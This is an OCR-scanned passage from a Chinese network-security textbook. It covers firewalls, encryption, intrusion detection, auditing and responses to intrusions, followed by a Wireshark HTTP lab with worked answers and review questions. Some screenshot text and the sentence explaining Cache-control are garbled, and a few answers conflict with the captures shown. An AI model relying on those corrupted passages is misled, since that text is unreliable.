上 ,根据 身份 对 提出 资源 访问 的 请 求 加 以 控制 。 网 络 访问 控制 技术 是 对 网 络 信息 系统 资源 
进行 保护 的 重要 措施 ,也 是 计算 机 系统 中 最 重要 和 最 基础 的 安全 机 制 。 

入 网 访问 控制 通过 对 用 户 名 、 用 户 密码 和 用 户 账号 默认 权限 的 综合 验证 ,检查 来 限制 用 
户 对 网 络 的 访问 , 它 能 控制 哪些 用 户 、 在 什么 时 间 及 使 用 哪 台 主机 入 网 。 入 网 访问 控制 为 网 
络 访问 提供 了 第 一 层 访问 控制 。 

网 络 用 户 一 般 分 为 三 类 : 系统 管理 员 用 户 , 负 责 网 络 系统 的 配置 和 管理 ; 普通 用 户 ,由 
系统 管理 员 创建 并 根据 他 们 的 实际 需要 为 其 分 配 权限 ; 审计 用 户 , 负 责 网 络 系统 的 安全 控 
制 和 资源 使 用 情况 的 审计 。 用 户 和 人 网 后 就 可 以 根据 自身 的 权限 访问 网 络 资源 。 权 限 控制 通 
过 访问 控制 表 来 规范 和 限制 用 户 对 网 络 资源 访问 ,访问 控制 表 中 规定 了 用 户 可 以 访问 哪些 
目录 、 子 目录 、 文 件 和 其 他 资源 ,指定 用 户 对 这 些 文件 .目录 等 资源 能 够 执行 哪些 操作 。 

2. 防火 墙 技 术 

防火 墙 是 一 种 高 级 访问 控制 设备 ,是 置 于 不 同 网 络 安全 域 之 间 的 一 系列 部 件 的 组 合 ， 
不 同 网 络 安全 域 间 通信 流 的 唯一 通道 , 它 能 根据 有 关 的 安全 策略 控制 (允许 .拒绝 ,监视 . 记 
录 ) 进 出 网 络 的 访问 行为 。 防 火 墙 是 网 络 安全 的 屏障 ,是 提供 安全 信息 服务 .实现 网 络 安全 
的 基础 设施 之 一 。 

防火 墙 能 极 大 地 提高 一 个 内 部 网 络 的 安全 性 ,防止 来 自 被 保护 区 域外 部 的 攻击 ,并 通过 
过 滤 不 安全 的 服务 而 降低 风险 ; 能 防止 内 部 信息 外 泄 和 屏蔽 有 害 信 息 , 利 用 防火 墙 对 内 部 
网 络 的 划分 ,可 以 实现 内 部 网 络 重点 网 段 的 隔离 ,限制 安全 问题 扩散 ,从 而 降低 了 局 部 重点 
或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 ; 能 强化 网 络 安全 策略 ,将 局 域 网 的 安全 管理 
集中 在 一 起 ,便于 统一 管理 和 执行 安全 策略 ; 能 严格 监控 和 审计 进出 网 络 的 信息 ,如 果 所 有 
的 访问 都 经 过 防火 墙 ,那么 防火 墙 就 能 记录 下 这 些 访问 并 做 出 日 志 记录 ,同时 也 能 提供 网 络 
使 用 情况 的 统计 数据 。 当 发 生 可 疑 动作 时 ,防火 墙 能 进行 适当 的 报警 ,并 提供 网 络 是 否 受到 
监测 和 攻击 的 详细 信息 。 

3. 数据 加 密 技 术 

数据 加 密 技 术 要 求 只 有 在 指定 的 用 户 或 网 络 下 ,才能 解除 密码 而 获得 原来 的 数据 ,这 就 
需要 给 数据 发 送 方 和 接受 方 以 一 些 特殊 的 信息 用 于 加 解密 ,这 就 是 所 谓 的 密 钥 。 其 密 钥 的 
值 是 从 大 量 的 随机 数 中 选取 的 。 按 加 密 算法 分 为 专用 密 钥 和 公开 密 钥 两 种 。 
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数据 加 密实 质 上 是 对 以 符号 为 基础 的 数据 进行 移 位 和 置换 的 变换 算法 ,这 种 变换 受 “ 密 
钥 " 控 制 。 常 用 的 数据 加 密 技术 有 私 用 密 钥 加 密 技术 和 公开 密 钥 加 密 技术 。 私 用 密 钥 加 密 
技术 利用 同一 个 密 钥 对 数据 进行 加 密 和 解密 ,这 个 密 钥 必须 秘密 保管 ,只 能 为 授权 用 户 所 
知 ,授权 用 户 既 可 以 用 该 密 钥 加 密 信息 ,也 可 以 用 该 密 钥 解密 信息 。DES 是 私 用 密 钥 加 密 
技术 中 最 具 代 表 性 的 算法 。 公 开 密 钥 加 密 技 术 采 用 两 个 不 同 的 密 钥 进行 加 密 和 解密 ,这 两 
个 密 钥 是 公 钥 和 私 钥 。 如 果 用 公 钥 对 数据 进行 加 密 , 只 有 用 对 应 的 私 钥 才能 进行 解密 ; 如 
果 用 私 钥 对 数据 进行 加 密 , 则 只 有 用 对 应 的 公 钥 才 能 解密 。 公 钥 是 公开 的 ,任何 人 可 以 用 公 
钥 加 密 信 息 ,再 将 密 文 发 送 给 私 钥 拥有 者 。 私 钥 是 保密 的 ,用 于 解密 其 接收 的 用 公 钥 加 密 过 
的 信息 。 目 前 比较 安全 的 采用 公开 密 钥 加 密 技 术 的 算法 主要 有 RSA 算法 及 其 变种 Rabin 

4. 入 侵 检 测 技术 

入 侵 检测 是 对 传统 安全 产品 的 合理 补充 ,帮助 系统 对 付 网 络 攻击 ,扩展 了 系统 管理 员 的 
安全 管理 能 力 ( 包 括 安全 审计 、 监 视 、 进 攻 识 别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 

它 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信 息 ,看 看 网 络 中 是 否 有 违 
反 安 全 策略 的 行为 和 遭 到 袭击 的 迹象 。 入 侵 检 测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ， 
在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 
实时 保护 。 它 能 监视 分 析 用 户 及 系统 活动 ,查找 用 户 的 非法 操作 ,评估 重要 系统 和 数据 文件 
的 完整 性 ,检测 系统 配置 的 正确 性 ,提示 管理 员 修补 系统 漏洞 ; 能 实时 地 对 检测 到 的 入 侵 行 
为 进行 反应 ,在 人 侵 攻击 对 系统 发 生 和 危害 前 利用 报警 与 防护 系统 驱逐 入 侵 攻 击 ,在 入 侵 攻 击 
过 程 中 减少 人 侵 攻 击 所 造成 的 损失 ,在 被 人 侵 攻击 后 收集 入 侵 攻击 的 相关 信息 ,作为 防范 系 
统 的 知识 ,添加 入 侵 策略 集中 ,增强 系统 的 防范 能 力 ,避免 系统 青 次 受到 同类 型 的 入 侵 攻 击 。 

入 侵 检 测 作为 一 项 动态 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保 
护 , 在 网 络 系统 受到 危害 之 前 拦截 和 响应 入 侵 , 它 与 静态 安全 防御 技术 (防火 墙 ) 相 互 配 合 可 
构成 坚固 的 网 络 安 全 防御 体系 。 

5. 网 络 安全 审计 

网 络 安全 审计 就 是 对 企业 网 络 安全 的 脆弱 性 进行 测试 .评估 、 分 析 的 过 程 。 它 就 是 在 一 
个 特定 的 网 络 环境 下 ,为 了 保障 网 络 和 数据 不 受 来 自 外 网 和 内 网 用 户 的 入 侵 和 破坏 ,而 运用 
各 种 技术 手段 实时 收集 和 监控 网 络 环境 中 每 一 个 组 成 部 分 的 系统 状态 ,安全 事件 ,以 便 集中 
报警 分析、 处 理 的 一 种 技术 手段 , 它 是 一 种 积极 、 主 动 的 安全 防御 技术 。 其 目的 是 为 了 在 最 
大 限度 内 保障 网 络 与 信息 的 安全 。 

网 络 安 全 是 动态 的 ,对 已 经 建立 的 系统 ,如 果 没 有 实时 的 、 集 中 的 可 视 化 审计 ,就 不 能 及 
时 评估 系统 的 安全 性 和 发 现 系 统 中 存在 的 安全 隐患 。 

计算 机 网 络 安全 审计 主要 包括 对 操作 系统 数据库 .Web、 邮 件 系统 、 网 络 设备 和 防火 墙 
等 项 目的 安全 审计 ,加 强 安全 教育 ,增强 安全 责任 意识 。 目 前 ,网 络 安全 审计 系统 主要 包含 
采集 多 种 类 型 的 日 志 数 据 \ 日 志 管 理 \ 日 志 查 询 、 入 侵 检 测 、 自 动 生成 安全 分 析 报 告 、. 网 络 状 
态 实时 监视 .事件 响应 机 制 、 集 中 管理 等 功能 。 

6. 网 络 安全 管理 

网 络 安全 管理 就 是 指 为 实现 信息 安全 的 目标 而 采取 的 一 系列 管理 制度 和 技术 手段 , 包 
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括 安全 检测 监控、 响应 和 调整 的 全 部 控制 过 程 。 需 要 指出 的 是 ,不 论 多 么 先进 的 安全 技术 ， 
都 只 是 实现 信息 安全 管理 的 手段 而 已 ,信息 安全 源 于 有 效 地 管理 ,要 使 先进 的 安全 技术 发 挥 
较 好 的 效果 ,就 必须 统一 安全 管理 平台 ,来 总 体 配 置 . 调 控 整 个 网 络 多 层面 、 分 布 式 的 安全 系 
统 , 实 现 对 各 种 网 络 安全 资源 的 集中 监控 、 统 一 策略 管理 .智能 审计 及 多 种 安全 功能 模块 之 
间 的 互动 ,从 而 有 效 简化 网 络 安全 管理 工作 ,提升 网 络 的 安全 水 平和 可 控制 性 、 可 管理 性 , 降 
低 用 户 的 整体 安全 管理 开销 。 

7. 发 现 黑客 入 侵 后 的 对 策 

首先 估计 形势 。 当 证 实 遭 到 入 侵 时 ,采取 的 第 一 步行 动 是 尽 可 能 快 地 估计 和 人 侵 造 成 的 
破坏 程度 。 

然后 要 采取 以 下 措施 。 

(1) 禁止 这 个 进程 来 切断 黑客 与 系统 的 连接 。 

(2) 使 用 工具 询问 他 们 究竟 想 要 做 什么 。 

(3) 跟踪 这 个 连接 , 找 出 黑客 的 来 路 和 身份 。 

(4) 管理 员 可 以 使 用 一 些 工具 来 监视 黑客 ,观察 他 们 在 做 什么 。 这 些 工具 包括 Snoop、 
ps \lastcomm 和 ttywatch 等 。 

(5) ps\w 和 who 这 些 命令 可 以 报告 每 一 个 用 户 使 用 的 终端 。 如 果 黑 客 是 从 一 个 终端 
访问 系统 ,这 种 情况 不 太 好 ,因为 这 需要 事先 与 电话 公司 联系 。 

(6) 使 用 who 和 netstat 可 以 发 现 入 侵 者 从 哪个 主机 上 过 来 ,然后 可 以 使 用 finger 命令 
来 查看 哪些 用 户 登录 进 远 程 系统 。 

(7) 修复 安全 漏洞 并 恢复 系统 ,不 给 黑客 留 有 可 乘 之 机 。 


《ED 利用 Wireshark 分 析 协 议 HTTP 


M 实 训 目的 

分 析 HTTP 协议 ,防范 攻击 。 

7 详 训 设备、 环境 

与 因特网 连接 的 计算 机 ,操作 系统 为 Windows, 安 装 有 Wireshark\IE 等 软件 。 

/ 实 训 步 队 

1. 利用 Wireshark 俘获 HTTP 分 组 

(1) 在 进行 跟踪 之 前 ,首先 清空 Web 浏览 器 的 高 速 缓存 来 确保 Web 网 页 是 从 网 络 中 
获取 的 ,而 不 是 从 高 速 缓冲 中 取得 的 。 之 后 ,还 要 在 客户 端 清空 DNS 高 速 缓存 ,来 确保 
Web 服务 器 域名 到 IP 地 址 的 映射 是 从 网 络 中 请 求 。 在 Windows XP 机 器 上 ,可 在 命令 提 
示 行 输入 “ipconfig/flushdns” 命 令 ( 清 除 DNS 解析 程序 缓存 ) 完 成 操作 。 

(2) 启动 Wireshark 分 组 俘获 器 。 

(3) 在 Web 浏览 器 中 输入 “http://www. google. com”。 

(4) 停止 分 组 俘获 。 

利用 Wireshark 俘获 的 HTTP 分 组 如 图 7-2 所 示 。 
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[UT - Wireshark 
Ele Edt Yew Go Capture Analyze Statistics Help 


时 宙 六 全 六 | 所 国 x% 


:202.210. .249.89. Continuation or non- 
202.202.210.104 .89. GET / HTTP/1.1 
66.249.89.147 http > 1770 [ACK] se 


66.249.89.147 202.202.210.104 http > 1770 [ACK] Se 
249 89.147 


202.202.210.104 /1.1 302 Found C 


10.104 205.5 EE DNS ETE ET TR 


由 Frame 18 (73 bytes on wire, 73 bytes captured) 
田 Ethernet II。 Src: Tsinohua 85:ad:ae (00:05:64:85:ad:ae). Dst: Fuiianst 
<| uu ] 


000 00 TST 07 00 0 64 8 aq ae O08 00 45 00 
| 010 00 3b 08 d6 00 00 80 11 f9 6e ca ca d2 68 ca ca 
oo20 do 6f b 0 5 28 36 77 19 01 00 00 01 
| 77 77 06 67 6f 6f 67 6c 
0040 65 02 63 6e 00 00 01 00 01 


| File: "CIDOCUME~ I\user\LOCALS~1\TempletherxxXXa095... | P: 290 D: 260 M: 0 Drops: O 


图 7-2 利用 Wireshark 俘获 的 HTTP 分 组 


在 URL http://www. google. com 中 ,www. google. com 是 一 个 具体 的 Web 服务 器 的 
域名 。 最 前 面 有 两 个 DNS 分 组 。 第 一 个 分 组 是 将 域名 www. google. com 转换 成 为 对 应 的 
IP 地 址 的 请 求 ,第 二 个 分 组 包含 了 转换 的 结果 。 这 个 转换 是 必要 的 ,因为 网 络 层 协议 -一 
IP 协议 ,是 通过 点 分 十 进 制 来 表示 因特网 主机 的 ,而 不 是 通过 www. google. com 这 样 的 域 
名 。 当 输入 “URL http: //www. google. com” 时 ,将 要 求 Web 服务 器 从 主机 www. google. 
com 上 请 求 数据 ,但 首先 Web 浏览 器 必须 确定 这 个 主机 的 IP 地 址 。 

随 着 转换 的 完成 ,Web 浏览 器 与 Web 服务 器 建立 一 个 TCP 连接 。 最 后 , Web 浏览 器 
使 用 已 建立 好 的 TCP 连接 来 发 送 请 求 “GET/HTTP/1. 1”。 这 个 分 组 描述 了 要 求 的 行为 
(*GET”) 及 文件 (只 写 “/” 是 因为 没有 指定 额外 的 文件 名 ), 还 有 所 用 到 的 协议 的 版 本 
HTTP/l 

2. HTTP GET/response 交互 

(1) 在 协议 框 中 ,选择 “GET/HTTP/1.1” 所 在 的 分 组 会 看 到 这 个 基本 请 求 行 后 跟随 着 
一 系列 额外 的 请 求 首部 。 在 首部 后 的 “\r\n” 表 示 一 个 回 车 和 换行 ,以 此 将 该 首部 与 下 一 个 
首部 隔 开 。 

“Host” 首 部 在 HTTP1. 1 版 本 中 是 必需 的 , 它 描述 了 URL 中 机 器 的 域名 ,本 例 中 是 
www. google. com。 这 就 允许 了 一 个 Web 服务 器 在 同一 时 间 支 持 许多 不 同 的 域名 。 有 了 
这 个 数据 ,Web 服务 器 就 可 以 区 别 客 户 试 图 连接 哪 一 个 Web 服务 器 ,并 对 每 个 客户 响应 不 
同 的 内 容 , 这 就 是 HTTP1.0 到 1.1 版 本 的 主要 变化 。 

User-Agent 首部 描述 了 提出 请 求 的 Web 浏览 器 及 客户 机 。 

接 下 来 是 一 系列 的 Accept 首部 ,包括 Accept (接受 )、Accept-Language (接受 语言 )、 
Accept-Encoding( 接 受 编码 )、Accept-Charset (接受 字符 集 )。 它 们 告诉 Web 服务 器 客户 
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a 


Web 浏览 器 准备 处 理 的 数据 类 型 。Web 服务 器 可 以 将 数据 转换 为 不 同 的 语言 和 格式 。 这 
些 首部 表明 了 客户 的 能 力 和 偏好 。 

Keep-Alive 及 Connection 首部 描述 了 有 关 TCP 连接 的 信息 ,通过 此 连接 发 送 HTTP 
请 求 和 响应 。 它 表明 在 发 送 请 求 之 后 连接 是 否 保持 活动 状态 及 保持 多 久 。 大 多 数 
HTTP1. 1 连接 是 持久 的 (Persistent) ,意思 是 在 每 次 请 求 后 不 关闭 TCP 连接 ,而 是 保持 该 
连接 以 接受 从 同一 台 服 务 器 发 来 的 多 个 请 求 。 

(2) 已 经 查看 了 由 Web 浏览 器 发 送 的 请 求 ,现在 来 观察 Web 服务 器 的 回答 。 响 应 首 
先 发 送 “HTTP/1. 1 200 ok”, 指 明 它 开始 使 用 HTTP1. 1 版 本 来 发 送 网 页 。 同 样 , 在 响应 分 
组 中 , 它 后 面 也 跟随 着 一 些 首部 。 最 后 ,被 请 求 的 实际 数据 被 发 送 。 

第 一 个 Cache-control 首部 ， 且 于 在 有 失 革 入 的 则 相生 全 于 两 泛 和 人 有 洒 ， 直 全 
来 引用 。 一 般 个 人 的 Web 浏览 高 速 缓存 一 些 本 机 最 近 访 问 过 的 网 页 ,随后 对 同一 页 面 
再 次 进行 访问 时 ,如 果 该 网 页 仍 存储 于 高 速 组 在 中 , 则 不 再 向 服务 器 请 求 数据 。 类 似 地 ,在 
同一 个 网 络 中 的 计算 机 可 以 共享 一 些 存在 高 速 缓存 中 的 页 面 ,防止 多 个 用 户 通过 到 其 他 网 
络 的 低速 网 络 连接 从 网 上 获取 相同 的 数据 。 这 样 的 高 速 缓存 被 称 为 代理 高 速 缓存 (Proxy 
Cache) 。 在 所 俘获 的 分 组 中 “Cache-control” 首 部 值 是 “private" 的 。 这 表明 服务 器 已 经 对 
这 个 用 户 产生 了 一 个 个 性 化 的 响应 ,而 且 可 以 被 存储 在 本 地 的 高 速 缓存 中 ,但 不 是 共享 的 高 
速 缓存 代理 。 

在 HTTP 请 求 中 ,Web 服务 器 列 出 内 容 类 型 及 可 接受 的 内 容 编码 。 此 例 中 Web 服务 
器 选择 发 送 内 容 的 类 型 是 text/html, 且 内 容 编码 是 gzip。 这 表明 数据 部 分 是 压缩 了 的 
HTML。 

服务 器 描述 了 一 些 关于 自身 的 信息 。 此 例 中 ,Web 服务 器 软件 是 Google 自己 的 Web 
服务 器 软件 。 响 应 分 组 还 用 Content-Length 首部 描述 了 数据 的 长 度 。 最 后 ,服务 器 还 在 
Date 首部 中 列 出 了 数据 发 送 的 日 期 和 时 间 。 

根据 俘获 窗口 内 容 回答 以 下 问题 。 

(1) 你 的 浏览 器 运行 的 是 HTTP1. 0, 还 是 HTTP1. 1? 你 所 访问 的 服务 器 所 运行 的 
HTTP 版 本 号 是 多 少 ? 

答 : HTTP 1. 1,， version1. 1, 如 图 7-3 所 示 。 


146 16.4078490'192.168.0.1 192.168.0.103 DNS 93 Standard query response Ox5d84 A 74.125,128.19¢ 


149 16.4422980'74.125.128.199 192.168.0.103 TCP 66 http > 60962 [SYN, ACK] Seq=0 Ack=1 Win=42900 Le 


151 16.4431430'74.125.128.199 192.168.0.103 TCP 66 http > 60961 [SYN, ACK] Seq=0 Ack=1 Win=42900 Le 
[92 10.4431810192.1068.0.103 74.129.128.199 _TCP 3460961 > htrp [ACK] Seq=1 Ack=1 Win=03780 Len=0 | 
[53 16.4443760157. 165.0. 103 7d.125.128. 199 HTrP jcer SHITPILT | 

154 16.4944330'74.125.128.199 192.168-0.103 TCP 60 http > 60962 [ACK] Seq=1 Ack=261 Win=42688 Len=( 

155 16.497662074.125.128.199 192.168.0.103 HTTP 1010 HTTP/1.1 302 Found (text/html) 


图 7-3 HTTP 版 本 截图 


(2) 你 的 浏览 器 向 服务 器 指出 它 能 接收 何 种 语言 版 本 的 对 象 ? 

答 : Accept Language:zh-CN\r\n, 如 图 7-4 所 示 。 

(3) 你 的 计算 机 的 IP 地 址 是 多 少 ? 服务 器 www. google. com 的 IP 地 址 是 多 少 ? 

答 : 计算 机 IP 地 址 是 “192. 168. 0. 103”; 服务 器 IP 地 址 是 “74. 125. 128. 199”, 如 图 7-5 
所 示 。 
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Hypertext Transfer Protocol 

-ET/PTP/EINM A 
Accept: text/html, application/xhtml+xml, : 
Accept-Language: zh-CN\r\n 


图 7-4 接收 何 种 语言 版 本 的 对 象 截图 


1330174.125.128.199 192.168.0.103 
图 7-5 IP 地址 结果 截图 


(4) 从 服务 器 向 你 的 浏览 器 返回 的 状态 代码 是 多 少 ? 
答 : 200 OK ,如 图 7-6 所 示 。 


HTTP 314 GET / HTTP/1.1 
HTTP 1010 HTTP/1.1 302 Found (text/html) 


HTTP 1091 HTTP/1.1 302 Found (text/htm1) 


HTTP 728 HTTP/1.1 200 OK (text/html) 


图 7-6 浏览 器 返回 的 状态 代码 截图 


(5) 你 从 服务 器 上 所 获取 的 HTML 文件 的 最 后 修改 时 间 是 多 少 ? 
答 : 21 dec 2013 14:03:47, 如 图 7-7 所 示 。 

(6) 返回 到 你 的 浏览 器 的 内 容 以 供 多 少 字 节 ? 

答 : 222, 如 图 7-8 所 示 。 


,Hypertext Transfer Protocol 
Servers Giantn 
Date: Sat, 21 Dec 2013 14:03:47 GMT\r\n a Content-Length: 222\r\n 
Expires: -1\r\n [Content length: 222] 
ens pet 和 汪 后 后 轴 a i 个 沁 4 
7-7 HTML 文件 的 最 后 修改 时 间 截图 7-8 字 节 截图 


3. HTTP 条 件 GETVresponse 交互 

(1) 启动 浏览 器 ,清空 浏览 器 的 缓存 。 

(2) 启动 Wireshark 分 组 俘获 器 ,开始 Wireshark 分 组 俘获 。 

(3) 在 浏览 器 地 址 栏 中 输入 网 址 *http://gaia. cs. umass. edu/wireshark-labs/ HTTP- 
wireshark-file2. html”。 浏 览 器 中 将 显示 一 个 具有 五 行 的 非常 简单 的 HTML 文件 。 

(4) 在 浏览 器 中 重新 输入 相同 的 URL 或 单 击 浏览 器 中 的 “刷新 ”按钮 。 

(5) 停止 Wireshark 分 组 俘获 ,在 显示 过 滤 筛 选 说 明 处 输入 “http”, 分 组 列表 子 窗 口中 
将 只 显示 所 俘获 到 的 HTTP 报 文 。 

4. 获取 长 文件 

(1) 启动 浏览 器 ,将 浏览 器 的 缓存 清空 。 

(2) 启动 Wireshark 分 组 俘获 器 ,开始 Wireshark 分 组 俘获 。 
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(3) 在 浏览 器 地 址 栏 中 输入 网 址 “http://gaia. cs. umass. edu/wireshark-labs/ HTTP- 
wireshark-file3. html”, 浏 览 器 将 显示 一 个 相当 大 的 美国 权力 法 案 。 


(4) 停止 Wireshark 分 组 俘获 ,在 显示 过 滤 筛 选 说 明 处 输入 "http”, 分 组 列表 子 窗口 中 
将 只 显示 所 俘获 到 的 HTTP 报 文 。 


根据 操作 回答 以 下 问题 。 
(1) 你 的 浏览 器 一 共 发 出 了 多 少 个 HTTP GET 请 求 ? 
答 : 1 个 ,如 图 7-9 所 示 。 


22 8.16945300'128.119.245.12 192.168.0.103 HTTP 500 HTTP/1.1 200 OK (text/html) 


图 7-9 发 出 HTTP GET 请 求 截图 


(2) 承载 这 一 个 HTTP 响应 报 文 一 共 需 要 多 少 个 data-containing TCP 报 文 段 ? 
答 : 4 个 ,如 图 7-10 所 示 。 


Iransmssion Concrol protoco!, Src port: nttp (8V), DsT Port: b13U/ (b13U/), Seq: 4 

[4 Reassembled TCP Segments (4802 bytes): #17(1452), #19(1452), #21(1452), #22(446) 
Frame: 17, payload: 0-1451 (1452 bytes)] 

[Frame: 1oad: 1452-29 45 es 

Frame: 21, payload: 2904-4355 (1452 bytes)] 

Frame: 22, payload: 4356-4801 (446 bytes) 

Segment count: 4] 

Reassembled TCP length: 4802] 


Reassembled TCP Data: 485454502f312e3120323030204f4b0d0a446174653a2053...] 


图 7-10 ”TCP 报 文 段 截图 


(3) 与 这 个 HTTP GET 请 求 相对 应 的 响应 报 文 的 状态 代码 和 状态 短语 是 什么 ? 
答 : 200。 


(4) 在 被 传送 的 数据 中 一 共有 多 少 个 HTTP 状态 行 与 TCP-induced* continuation” 
有 关 ? 
答 : 4 个 ,如 图 7-11 所 示 。 


田 Iransmss1on Concrol Proroco1，src port: nttp (UY), DstT port: b13U/ (bl3U/)，seq: 4 
日 [4 Reassembled TCP Segments (4802 bytes): #17(1452), #19(1452), #21(1452), #22(446) 

[Frame: 17, payload: 0-1451 (1452 

[Frame: 19, payload: 1452-2903 (1452 bytes) 

[Frame: 21, payload: 2904-4355 (1452 bytes)] 

[Frame: 22, payload: 4356-4801 (446 bytes)] 

[Segment count: 4] 

[Reassembled TCP length: 4802] 


[Reassembled TCP Data: 485454502f312e3120323030204f4b0d0a446174653a2053...] 


7-11 被 传送 的 数据 截图 


5. 贬 有 对 象 的 HTML 文档 

(1) 启动 浏览 器 ,将 浏览 器 的 缓存 清空 。 

(2) 启动 Wireshark 分 组 俘获 器 ,开始 Wireshark 分 组 俘获 。 

(3) 在 浏览 器 地 址 栏 中 输入 网 址 “http://gaia. cs. umass. edu/wireshark-labs/ HTTP- 
wireshark-file4. html”, 浏 览 器 将 显示 一 个 具有 两 个 图 片 的 短 HTTP 文件 。 

(4) 停止 Wireshark 分 组 俘获 ,在 显示 过 滤 筛 选 说 明 处 输入 “http”, 分 组 列表 子 窗 口中 
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将 只 显示 所 俘获 到 的 HTTP 报 文 。 

根据 操作 回答 以 下 问题 。 

(1) 你 的 浏览 器 一 共 发 出 了 多 少 个 HTTP GET 请 求 ? 这 些 请 求 被 发 送 到 的 目的 地 的 
IP 地 址 是 多 少 ? 

答 : 4 个 , 128. 119. 245. 12 ,128. 119. 240. 90 ,如 图 7-12 所 示 。 


cea 192.1bg.0.103 HTTP Z93 HTTP/1.1 z00 OK 
EE 28 245.12 


EL 
130 / -034379UN LUL. ZZ0. 18U. 35 

7.93867500193.168.0.103 
154 8. 21381900128.119.245.12 


1078 HTTP/1.1 200 Ok (JPEG JFIF image) 
1078 HTTP/1.1 200 OK CJPEG JFIF image) 


Ee 3 01003100 T7119 3205-12 


图 7-12 发 出 HTTP GET 请 求 截图 


浏览 器 在 下 载 这 两 个 图 片 时 ,是 串 行 下 载 还 是 并 行 下载 ? 请 解释 。 
: 并 行 下 载 ,因为 这 样 可 以 不 用 每 次 下 载 都 要 建立 TCP 连接 ,可 以 缩短 下 载 的 时 间 。 


6. HTTP 认证 


(1) 启动 浏览 器 ,将 浏览 器 的 缓存 清空 。 

(2) 启动 Wireshark 分 组 俘获 器 ,开始 Wireshark 分 组 俘获 。 

(3) 在 浏览 器 地 址 栏 中 输入 网 址 “http://gaia. cs. umass. edu/wireshark-labs/ 
protected_pages/HTTP-wireshark-file5. html”, 浏 览 器 将 显示 一 个 HTTP 文件 ,输入 所 需 
要 的 用 户 名 和 密码 (用 户 名 "wireshark-students”, 密 码 “network”) 。 

(4) 停止 Wireshark 分 组 俘获 ,在 显示 过 滤 筛 选 说 明 处 输入 “http”, 分 组 列表 子 窗口 中 
将 只 显示 所 俘获 到 的 HTTP 报 文 。 

根据 操作 回答 以 下 问题 。 

(1) 对 于 浏览 器 发 出 的 最 初 的 HTTP GET 请 求 , 服 务 器 的 响应 是 什么 (状态 代码 和 状 
态 短语 )? 

答 : 200 OK, 如 图 7-13 所 示 。 


加 cv 
475 GET /wireshark-1abs/protected_pagg 
HTTP 485 HTTP/1.1 200 OK (text/htm 


图 7-13 发 出 HTTP GET 请 求 截图 
(2) 当 浏 览 器 发 出 第 二 个 HTTP GET 请 求 时 ,在 HTTP GET 报 文中 包含 了 哪些 新 的 
字段 ? 
答 : Authorization: Basic, 如 图 7-14 所 示 。 


a Authorization: Basic d21yZXNoYXIrLXNOdwR1bnRzO 
\rvn 


图 7-14 HTTP GET 报 文 中 包含 字段 截图 
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本 章 小 结 


(1) 在 计算 机 网 络 日 益 成 为 生活 中 不 可 或 缺 的 工具 时 ,计算 机 网 络 的 安全 性 已 经 引起 
了 公众 的 高 度 重视 。 计 算 机 网 络 的 安全 威胁 来 自 诸多 方面 ,黑客 攻击 是 最 重要 的 威胁 来 源 
之 一 。 本 章 介 绍 了 黑客 和 骇 客 的 起 源 、 概 念 ,以 及 黑客 的 分 类 ( 白 帽子 、 黑 帽子 、 灰 帽子 ) 、 黑 
客 的 攻击 分 类 和 步骤 。 

(2) 黑客 攻击 ,除了 掌握 基本 的 操作 系统 知识 以 外 ,还 需要 各 种 工具 ,如 各 类 扫描 器 ,一 
些 比较 优秀 的 木马 软件 ,监听 类 软件 等 。 对 常用 黑客 软件 按 用 途 进 行 分 类 ,并 对 国产 经 典 软 
件 和 常用 软件 进行 了 重点 介绍 。 

(3) 防范 黑客 攻击 ,要 从 以 下 几 个 方面 入 手 : 网 络 访问 控制 技术 、 防 火 墙 技 术 、 数 据 加 
密 技术 、 人 侵 检测 技术 、 网 络 安全 审计 、 网 络 安全 管理 ,发 现 黑客 入 侵 后 的 对 策 。 在 实 训 环节 
重点 介绍 了 IPC$ 攻击 和 防御 方法 。 


. 什么 是 黑客 ?简要 叙述 黑客 的 攻击 步骤 。 

. 什么 是 防火 墙 ? 解释 防火 墙 的 基本 功能 及 其 局 限 性 。 
. 计算 机 病毒 有 哪些 主要 特点 ? 

. 黑客 掩盖 踪迹 和 隐藏 的 手段 有 哪些 ? 

. 简 述 黑客 的 分 类 及 目的 。 

. 黑客 人 侵 后 的 对 策 有 哪些 ? 

. 简 述 黑客 攻击 防范 技术 。 


和 AAD 
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随 着 我 国 计 算 网 络 领 域 的 发 展 ,其 开放 性 与 共享 性 也 会 不 断 扩 大 ,人 与 人 之 间 的 联系 会 
更 加 紧密 ,网 络 已 经 逐渐 普及 到 社会 各 个 领域 ,对 社会 带 来 的 影响 也 在 不 断 扩 大 。 因 此 ,对 
于 一 些 开 放 型 的 信息 必须 要 加 大 其 控制 的 力度 ,严防 黑客 及 破坏 分 子 的 不 法 行为 。 这 是 一 
场 无 形 的 战斗 ,在 这 场 斗争 中 ,安全 技术 是 最 为 关键 的 方面 ,提高 安全 防御 技术 ,是 提高 我 国 
计算 机 网 络 安全 的 根本 所 在 。 


8.1 网 络 安 全 协议 


8.1.1 网 络 体 系 结构 


在 (计算 机 网 络 ) 课 程 上 学 生 都 学 习 过 关于 网 络 体系 结构 的 知识 。 在 这 一 节 里 首先 会 对 
相关 知识 做 一 个 简单 的 回顾 和 概括 ,以 方便 进一步 深入 讨论 相关 的 计算 机 网 络 安全 问题 。 

计算 机 网 络 涉及 的 网 络 体系 结构 知识 的 内 容 一 般 会 介绍 为 什么 要 将 网 络 协议 进行 分 
层 ,以 及 一 些 分 层 的 体系 结构 。 

计算 机 进程 之 间 的 通信 是 一 个 很 庞大 且 复 杂 的 问题 。 人 类 解决 此 类 大 而 复杂 问题 一 般 
采取 的 方式 是 将 它 分 解 为 若干 个 相对 容易 解决 的 小 问题 。 为 了 解决 计算 机 通信 的 问题 ,人 
们 采取 的 问题 分 解 方法 是 将 网 络 通信 问题 分 层 。 计 算 机 网 络 课程 里 面 , 关 于 网 络 体系 结构 
的 内 容 主 要 就 是 讨论 网 络 分 为 哪些 层 , 以 及 各 个 层 的 主要 任务 是 做 什么 的 。 

针对 现存 网 络 的 不 同 的 体系 结构 分 层 有 不 同 的 方法 ,大 家 学 习 过 的 一 般 会 有 诸如 ISO 
